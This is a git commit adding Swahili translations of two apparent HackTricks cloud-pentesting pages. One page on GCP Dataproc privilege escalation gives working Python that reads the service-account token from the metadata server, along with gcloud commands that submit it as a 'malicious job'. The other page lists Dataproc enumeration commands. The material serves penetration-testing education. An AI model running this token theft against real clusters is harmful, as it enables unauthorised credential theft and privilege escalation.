Translated ['src/pentesting-cloud/gcp-security/gcp-privilege-escalation/

This commit is contained in:
Translator
2025-01-26 21:46:24 +00:00
parent 64c523ea70
commit dbded31bb1
2 changed files with 97 additions and 0 deletions

View File

@@ -0,0 +1,54 @@
# GCP Dataproc Privilege Escalation
{{#include ../../../banners/hacktricks-training.md}}
## Dataproc
{{#ref}}
../gcp-services/gcp-dataproc-enum.md
{{#endref}}
### `dataproc.clusters.get`, `dataproc.clusters.use`, `dataproc.jobs.create`, `dataproc.jobs.get`, `dataproc.jobs.list`, `storage.objects.create`, `storage.objects.get`
Sikuweza kupata shell ya kurudi kwa kutumia njia hii, hata hivyo inawezekana kuvuja token ya SA kutoka kwa mwisho wa metadata kwa kutumia njia iliyoelezewa hapa chini.
#### Hatua za kutumia
- Weka skripti ya kazi kwenye GCP Bucket
- Wasilisha kazi kwa klasta ya Dataproc.
- Tumia kazi hiyo kufikia seva ya metadata.
- Vuja token ya akaunti ya huduma inayotumika na klasta.
```python
import requests
metadata_url = "http://metadata/computeMetadata/v1/instance/service-accounts/default/token"
headers = {"Metadata-Flavor": "Google"}
def fetch_metadata_token():
try:
response = requests.get(metadata_url, headers=headers, timeout=5)
response.raise_for_status()
token = response.json().get("access_token", "")
print(f"Leaked Token: {token}")
return token
except Exception as e:
print(f"Error fetching metadata token: {e}")
return None
if __name__ == "__main__":
fetch_metadata_token()
```
```bash
# Copy the script to the storage bucket
gsutil cp <python-script> gs://<bucket-name>/<python-script>
# Submit the malicious job
gcloud dataproc jobs submit pyspark gs://<bucket-name>/<python-script> \
--cluster=<cluster-name> \
--region=<region>
```
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -0,0 +1,43 @@
# GCP - Dataproc Enum
{{#include ../../../banners/hacktricks-training.md}}
## Basic Infromation
Google Cloud Dataproc ni huduma inayosimamiwa kikamilifu kwa ajili ya kuendesha Apache Spark, Apache Hadoop, Apache Flink, na mifumo mingine ya data kubwa. Inatumika hasa kwa ajili ya usindikaji wa data, kuuliza, kujifunza kwa mashine, na uchambuzi wa mtiririko. Dataproc inawawezesha mashirika kuunda vikundi vya kompyuta vilivyogawanywa kwa urahisi, ikijumuisha kwa urahisi na huduma nyingine za Google Cloud Platform (GCP) kama Cloud Storage, BigQuery, na Cloud Monitoring.
Vikundi vya Dataproc vinakimbia kwenye mashine za virtual (VMs), na akaunti ya huduma inayohusishwa na VMs hizi inamua ruhusa na kiwango cha ufikiaji wa kundi.
## Components
Kikundi cha Dataproc kwa kawaida kinajumuisha:
Master Node: Inasimamia rasilimali za kundi na kuratibu kazi zilizogawanywa.
Worker Nodes: Zinatekeleza kazi zilizogawanywa.
Service Accounts: Zinashughulikia simu za API na kufikia huduma nyingine za GCP.
## Enumeration
Vikundi vya Dataproc, kazi, na mipangilio vinaweza kuhesabiwa ili kukusanya taarifa nyeti, kama vile akaunti za huduma, ruhusa, na uwezekano wa mipangilio isiyo sahihi.
### Cluster Enumeration
Ili kuhesabu vikundi vya Dataproc na kupata maelezo yao:
```
gcloud dataproc clusters list --region=<region>
gcloud dataproc clusters describe <cluster-name> --region=<region>
```
### Job Enumeration
```
gcloud dataproc jobs list --region=<region>
gcloud dataproc jobs describe <job-id> --region=<region>
```
### Privesc
{{#ref}}
../gcp-privilege-escalation/gcp-dataproc-privesc.md
{{#endref}}
{{#include ../../../banners/hacktricks-training.md}}